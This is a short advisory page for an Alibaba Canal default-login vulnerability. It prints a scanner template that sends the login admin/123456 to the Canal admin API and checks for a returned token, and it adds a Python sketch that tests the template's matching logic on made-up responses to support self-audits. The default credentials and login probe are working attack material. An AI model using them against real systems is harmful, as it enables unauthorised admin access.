canal-default-login: Alibaba Canal Default Login

Date: 2025-08-01 | Affected software: Alibaba Canal | PoC: public

Vulnerability description

An Alibaba Canal default login was discovered.

PoC code [public]

id: canal-default-login

info:
  name: Alibaba Canal Default Login
  author: pdteam
  severity: high
  description: An Alibaba Canal default login was discovered.
  reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: canal,alibaba,default-login,vuln

http:
  - raw:
      - |
        POST /api/v1/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 123456

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'data":{"token"'
          - '"code":20000'
# digest: 4b0a00483046022100fac00e2ece2fa4599c4c8b787230f8b6588c673566a2b01f925fa9e33cdd30ce0221009318ab62fb1557d9f771a534ce6fb3a27558077322fb03aa9f60b07e69dbd1df:922c64590222798bb761d5b6d8e72950
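As an added illustration, not part of the template above or of the Canal project, the following Python evaluates the template's matcher logic and its pitchfork payload pairing offline against constructed sample responses, and adds a stricter JSON-based check that does not depend on the exact byte layout the substring matchers rely on:

```python
import json

# Matcher values copied from the canal-default-login template above.
REQUIRED_STATUS = 200
REQUIRED_WORDS = ('data":{"token"', '"code":20000')


def matches_template(status: int, body: str) -> bool:
    """Template semantics: status 200 AND both words present (matchers-condition: and)."""
    return status == REQUIRED_STATUS and all(w in body for w in REQUIRED_WORDS)


def login_accepted(status: int, body: str) -> bool:
    """Structural check: parse the JSON instead of substring matching, so
    whitespace or key ordering in the response cannot cause a false negative."""
    if status != REQUIRED_STATUS:
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    data = doc.get("data")
    return doc.get("code") == 20000 and isinstance(data, dict) and bool(data.get("token"))


def pitchfork(payloads: dict) -> list:
    """attack: pitchfork pairs the i-th value of every payload list (no cross product),
    so the template above issues exactly one request: admin / 123456."""
    keys = list(payloads)
    return [dict(zip(keys, combo)) for combo in zip(*(payloads[k] for k in keys))]


# Constructed sample responses (not captured from any real host).
ACCEPTED = '{"code":20000,"message":null,"data":{"token":"abc"}}'
ACCEPTED_SPACED = '{"code": 20000, "data": {"token": "abc"}}'
REJECTED = '{"code":40001,"message":"bad credentials","data":null}'

if __name__ == "__main__":
    print(matches_template(200, ACCEPTED), login_accepted(200, ACCEPTED_SPACED))
```

The spaced variant is the interesting case: the template's word matchers miss it while the JSON check still flags it, which is worth knowing when you turn this into an internal self-audit or a response-based detection.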
